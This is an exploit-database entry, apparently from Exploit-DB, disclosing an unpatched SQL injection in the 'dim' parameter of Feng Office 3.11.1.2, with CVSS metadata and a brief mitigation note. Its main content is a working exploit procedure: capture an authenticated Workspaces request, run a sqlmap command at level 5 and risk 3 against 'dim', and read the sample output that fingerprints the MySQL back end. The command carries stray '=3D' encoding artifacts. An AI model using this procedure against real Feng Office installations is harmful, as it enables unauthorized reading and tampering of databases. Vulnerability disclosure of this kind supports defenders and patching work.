Feng Office 3.11.1.2 - SQL Injection

vendor:

Feng Office

by:

Andrey Stoykov

6.1

CVSS

HIGH

SQL Injection

CWE

Product Name: Feng Office

Affected Version From: 3.11.1.2

Affected Version To: 3.11.1.2

Patch Exists: NO

Related CWE:

CPE: a:feng_office:3.11.1.2

Metasploit:

Other Scripts:

Platforms Tested: Ubuntu 22.04

2024

Feng Office 3.11.1.2 – SQL Injection

The exploit involves performing SQL injection in Feng Office version 3.11.1.2 by manipulating the 'dim' parameter value in the HTTP GET request. By using tools like SQLMap, an attacker can automate the injection process to access or manipulate the database.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input to prevent SQL injection attacks. Regular security testing and code reviews can also help identify and fix such vulnerabilities.

Source

Exploit-DB raw data:

# Exploit Title: Feng Office 3.11.1.2 - SQL Injection
# Date: 7/2024
# Exploit Author: Andrey Stoykov
# Version: 3.11.1.2
# Tested on: Ubuntu 22.04
# Blog: http://msecureltd.blogspot.com


SQL Injection:

1. Login to application
2. Click on "Workspaces"
3. Copy full URL
4. Paste the HTTP GET request into text file
5. Set the injection point to be in the "dim" parameter value
6. Use SQLMap to automate the process

sqlmap -r request.txt --threads 1 --level 5 --risk 3 --dbms=3Dmysql -p dim =
--fingerprint

[...]
[12:13:03] [INFO] confirming MySQL
[12:13:04] [INFO] the back-end DBMS is MySQL
[12:13:04] [INFO] actively fingerprinting MySQL
[12:13:05] [INFO] executing MySQL comment injection fingerprint
web application technology: Apache
back-end DBMS: active fingerprint: MySQL >=3D 5.7
               comment injection fingerprint: MySQL 5.7.37
[...]